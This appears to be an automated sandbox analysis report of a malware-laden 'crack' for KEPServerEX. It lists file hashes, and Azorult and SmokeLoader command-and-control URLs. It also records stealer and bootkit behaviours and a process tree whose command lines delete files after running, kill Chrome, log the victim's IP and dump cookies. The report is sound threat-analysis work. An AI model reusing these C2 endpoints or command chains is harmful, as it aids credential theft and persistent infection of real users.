Resubmissions

13-02-2021 13:20

210213-v5rv7ejb7n 10

Analysis

  • max time kernel
    1800s
  • max time network
    1384s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-02-2021 13:20

General

  • Target

    Kepserverex_5_5_14_493_crack_by_CORE.exe

  • Size

    9.0MB

  • MD5

    10a7ec6eec9d29e7cf84477015651b65

  • SHA1

    c6b132ff8919f5da4959d68b5a9cf86919ccebee

  • SHA256

    a252756f1326333e8587740cfecad63d80ffd26dd49d6b9699d685fb5096b730

  • SHA512

    34c53db9f782e6899004673c3c531b58aacc2153554fd2ca06b47d80d21f8d536912f4ec7f7336738e24b034f5a567b32cf99015ee8c01259902b63a86722aaa

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

rc4.i32
rc4.i32

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 8 IoCs
  • Executes dropped EXE 37 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 14 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • themida 2 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 51 IoCs
  • Drops file in Windows directory 10 IoCs
  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Kepserverex_5_5_14_493_crack_by_CORE.exe
    "C:\Users\Admin\AppData\Local\Temp\Kepserverex_5_5_14_493_crack_by_CORE.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:944
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3300
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:668
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4004
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:2296
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:3084
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:732
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2760
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:1352
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:856
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          4⤵
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Writes to the Master Boot Record (MBR)
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1188
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
            5⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:3280
          • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
            C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks whether UAC is enabled
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of SetThreadContext
            • Checks SCSI registry key(s)
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1700
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:4912
            • C:\Users\Admin\AppData\Roaming\1613225902607.exe
              "C:\Users\Admin\AppData\Roaming\1613225902607.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613225902607.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:4240
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:4312
            • C:\Users\Admin\AppData\Roaming\1613225907079.exe
              "C:\Users\Admin\AppData\Roaming\1613225907079.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613225907079.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:4324
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:4380
            • C:\Users\Admin\AppData\Roaming\1613225912796.exe
              "C:\Users\Admin\AppData\Roaming\1613225912796.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613225912796.txt"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:4392
            • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
              C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:1224
            • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
              "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetWindowsHookEx
              PID:4308
            • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
              C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:4988
              • C:\Users\Admin\AppData\Local\Temp\is-RNS2I.tmp\23E04C4F32EF2158.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-RNS2I.tmp\23E04C4F32EF2158.tmp" /SL5="$B00D4,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                7⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                PID:5036
                • C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                  "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
                  8⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of SetWindowsHookEx
                  PID:4620
                  • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                    "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:768
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                  8⤵
                  • Checks computer location settings
                  PID:2116
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
              6⤵
                PID:4508
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  7⤵
                  • Runs ping.exe
                  PID:4356
            • C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
              C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
              5⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Writes to the Master Boot Record (MBR)
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              PID:1092
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                6⤵
                  PID:4984
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    7⤵
                    • Kills process with taskkill
                    PID:5048
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
                  6⤵
                    PID:1324
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      7⤵
                      • Runs ping.exe
                      PID:4284
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1628
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    6⤵
                    • Runs ping.exe
                    PID:4124
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                4⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                PID:2292
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 2944
                  5⤵
                  • Drops file in Windows directory
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4976
              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                4⤵
                • Executes dropped EXE
                PID:4740
                • C:\Users\Admin\AppData\Roaming\67F2.tmp.exe
                  "C:\Users\Admin\AppData\Roaming\67F2.tmp.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:4180
                  • C:\Users\Admin\AppData\Roaming\67F2.tmp.exe
                    "C:\Users\Admin\AppData\Roaming\67F2.tmp.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks processor information in registry
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5100
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                  5⤵
                    PID:4244
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1
                      6⤵
                      • Runs ping.exe
                      PID:4316
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:2756
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\installer.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:4364
                    • C:\ProgramData\8543617.93
                      "C:\ProgramData\8543617.93"
                      6⤵
                      • Executes dropped EXE
                      PID:4384
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 724
                        7⤵
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4628
                    • C:\ProgramData\5503031.60
                      "C:\ProgramData\5503031.60"
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:4388
                      • C:\ProgramData\Windows Host\Windows Host.exe
                        "C:\ProgramData\Windows Host\Windows Host.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:4796
                    • C:\ProgramData\6915393.76
                      "C:\ProgramData\6915393.76"
                      6⤵
                      • Executes dropped EXE
                      • Checks BIOS information in registry
                      • Checks whether UAC is enabled
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4568
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gdrrr.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gdrrr.exe"
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:4804
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:4812
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4088
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:5660
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    5⤵
                    • Executes dropped EXE
                    PID:5756
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Enumerates connected drives
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding DDB8CAD36971DD2CAF4BDD628A7C235D C
              2⤵
              • Loads dropped DLL
              PID:3696
            • C:\Windows\system32\srtasks.exe
              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
              2⤵
                PID:4560
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:1384
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                1⤵
                • Checks SCSI registry key(s)
                • Modifies data under HKEY_USERS
                PID:3584
              • C:\Program Files (x86)\gdiview\gdiview\GDIView.exe
                "C:\Program Files (x86)\gdiview\gdiview\GDIView.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:5012
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                1⤵
                • Drops file in Windows directory
                • Modifies Control Panel
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:4640
              • C:\Windows\system32\browser_broker.exe
                C:\Windows\system32\browser_broker.exe -Embedding
                1⤵
                • Modifies Internet Explorer settings
                PID:4348
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies registry class
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:1468
              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                PID:788
              • C:\Windows\system32\compattelrunner.exe
                C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                1⤵
                  PID:2372
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                  1⤵
                  • Modifies registry class
                  PID:4108
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                  1⤵
                  • Modifies registry class
                  PID:5184
                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                  1⤵
                  • Modifies registry class
                  PID:5268
                • C:\Users\Admin\AppData\Roaming\tjjbeji
                  C:\Users\Admin\AppData\Roaming\tjjbeji
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: MapViewOfSection
                  PID:5364
                • C:\Users\Admin\AppData\Roaming\tjjbeji
                  C:\Users\Admin\AppData\Roaming\tjjbeji
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:5680
                • C:\Users\Admin\AppData\Roaming\tjjbeji
                  C:\Users\Admin\AppData\Roaming\tjjbeji
                  1⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:5784

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/768-204-0x00000000001C0000-0x00000000001CA000-memory.dmp

                  Filesize

                  40KB

                • memory/768-205-0x0000000000400000-0x000000000040A000-memory.dmp

                  Filesize

                  40KB

                • memory/768-201-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/768-203-0x0000000000030000-0x000000000003A000-memory.dmp

                  Filesize

                  40KB

                • memory/768-202-0x0000000004FD0000-0x0000000004FD1000-memory.dmp

                  Filesize

                  4KB

                • memory/1092-49-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/1092-58-0x0000000002F50000-0x00000000033FF000-memory.dmp

                  Filesize

                  4.7MB

                • memory/1188-33-0x0000000010000000-0x000000001033D000-memory.dmp

                  Filesize

                  3.2MB

                • memory/1188-26-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/1224-178-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/1700-57-0x0000000003750000-0x0000000003BFF000-memory.dmp

                  Filesize

                  4.7MB

                • memory/1700-47-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/2296-28-0x0000000000400000-0x0000000000983000-memory.dmp

                  Filesize

                  5.5MB

                • memory/2296-32-0x0000000000400000-0x0000000000983000-memory.dmp

                  Filesize

                  5.5MB

                • memory/2868-219-0x0000000000890000-0x00000000008A6000-memory.dmp

                  Filesize

                  88KB

                • memory/2868-225-0x00000000008C0000-0x00000000008D6000-memory.dmp

                  Filesize

                  88KB

                • memory/2868-213-0x0000000000660000-0x0000000000676000-memory.dmp

                  Filesize

                  88KB

                • memory/2868-208-0x00000000056E0000-0x00000000056F6000-memory.dmp

                  Filesize

                  88KB

                • memory/4004-42-0x0000000000FE0000-0x0000000000FFB000-memory.dmp

                  Filesize

                  108KB

                • memory/4004-31-0x00000000032C0000-0x000000000345C000-memory.dmp

                  Filesize

                  1.6MB

                • memory/4004-41-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                  Filesize

                  4KB

                • memory/4004-40-0x0000000003C90000-0x0000000003D7F000-memory.dmp

                  Filesize

                  956KB

                • memory/4180-104-0x0000000000A00000-0x0000000000A01000-memory.dmp

                  Filesize

                  4KB

                • memory/4180-108-0x0000000000570000-0x00000000005B5000-memory.dmp

                  Filesize

                  276KB

                • memory/4240-69-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4308-186-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4312-80-0x0000018C6A810000-0x0000018C6A811000-memory.dmp

                  Filesize

                  4KB

                • memory/4312-74-0x00007FF95ABF0000-0x00007FF95AC6E000-memory.dmp

                  Filesize

                  504KB

                • memory/4324-79-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4364-121-0x0000000000F20000-0x0000000000F21000-memory.dmp

                  Filesize

                  4KB

                • memory/4364-130-0x0000000000F30000-0x0000000000F32000-memory.dmp

                  Filesize

                  8KB

                • memory/4364-118-0x00007FF942950000-0x00007FF94333C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4364-119-0x0000000000910000-0x0000000000911000-memory.dmp

                  Filesize

                  4KB

                • memory/4364-122-0x0000000000F40000-0x0000000000F5E000-memory.dmp

                  Filesize

                  120KB

                • memory/4364-123-0x0000000000F60000-0x0000000000F61000-memory.dmp

                  Filesize

                  4KB

                • memory/4380-84-0x00007FF95ABF0000-0x00007FF95AC6E000-memory.dmp

                  Filesize

                  504KB

                • memory/4380-89-0x000001A31BDC0000-0x000001A31BDC1000-memory.dmp

                  Filesize

                  4KB

                • memory/4384-135-0x00000000003E0000-0x00000000003E1000-memory.dmp

                  Filesize

                  4KB

                • memory/4384-131-0x0000000070650000-0x0000000070D3E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/4388-142-0x0000000008300000-0x0000000008301000-memory.dmp

                  Filesize

                  4KB

                • memory/4388-132-0x0000000070650000-0x0000000070D3E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/4388-141-0x0000000001660000-0x000000000166B000-memory.dmp

                  Filesize

                  44KB

                • memory/4388-139-0x00000000014D0000-0x00000000014D1000-memory.dmp

                  Filesize

                  4KB

                • memory/4388-136-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

                  Filesize

                  4KB

                • memory/4388-145-0x0000000007EE0000-0x0000000007EE1000-memory.dmp

                  Filesize

                  4KB

                • memory/4392-88-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4568-148-0x0000000005D40000-0x0000000005D41000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-182-0x00000000070E0000-0x00000000070E1000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-167-0x0000000005DE0000-0x0000000005DE1000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-146-0x0000000000C40000-0x0000000000C41000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-168-0x0000000005E60000-0x0000000005E61000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-144-0x0000000070650000-0x0000000070D3E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/4568-171-0x0000000005E70000-0x0000000005E71000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-173-0x0000000005EB0000-0x0000000005EB1000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-174-0x0000000006040000-0x0000000006041000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-190-0x0000000007EB0000-0x0000000007EB1000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-189-0x0000000007780000-0x0000000007781000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-187-0x0000000007350000-0x0000000007351000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-166-0x0000000006480000-0x0000000006481000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-159-0x0000000003A10000-0x0000000003A11000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-154-0x0000000077294000-0x0000000077295000-memory.dmp

                  Filesize

                  4KB

                • memory/4568-183-0x00000000077E0000-0x00000000077E1000-memory.dmp

                  Filesize

                  4KB

                • memory/4620-199-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4628-140-0x0000000004520000-0x0000000004521000-memory.dmp

                  Filesize

                  4KB

                • memory/4740-97-0x0000000000D30000-0x0000000000D3D000-memory.dmp

                  Filesize

                  52KB

                • memory/4740-103-0x0000000000400000-0x000000000044C000-memory.dmp

                  Filesize

                  304KB

                • memory/4796-169-0x0000000004930000-0x0000000004931000-memory.dmp

                  Filesize

                  4KB

                • memory/4796-170-0x0000000007DF0000-0x0000000007DF1000-memory.dmp

                  Filesize

                  4KB

                • memory/4796-153-0x0000000070650000-0x0000000070D3E000-memory.dmp

                  Filesize

                  6.9MB

                • memory/4912-65-0x000002919B7A0000-0x000002919B7A1000-memory.dmp

                  Filesize

                  4KB

                • memory/4912-61-0x0000000010000000-0x0000000010057000-memory.dmp

                  Filesize

                  348KB

                • memory/4912-60-0x00007FF95ABF0000-0x00007FF95AC6E000-memory.dmp

                  Filesize

                  504KB

                • memory/4976-63-0x0000000004940000-0x0000000004941000-memory.dmp

                  Filesize

                  4KB

                • memory/4988-192-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/4988-195-0x0000000000401000-0x000000000040C000-memory.dmp

                  Filesize

                  44KB

                • memory/5036-194-0x00000000725A0000-0x0000000072633000-memory.dmp

                  Filesize

                  588KB

                • memory/5036-196-0x00000000001E0000-0x00000000001E1000-memory.dmp

                  Filesize

                  4KB

                • memory/5100-105-0x0000000000400000-0x0000000000448000-memory.dmp

                  Filesize

                  288KB

                • memory/5100-109-0x0000000000400000-0x0000000000448000-memory.dmp

                  Filesize

                  288KB

                • memory/5364-209-0x00000000050F0000-0x00000000050F1000-memory.dmp

                  Filesize

                  4KB

                • memory/5680-215-0x0000000005060000-0x0000000005061000-memory.dmp

                  Filesize

                  4KB

                • memory/5784-221-0x0000000005070000-0x0000000005071000-memory.dmp

                  Filesize

                  4KB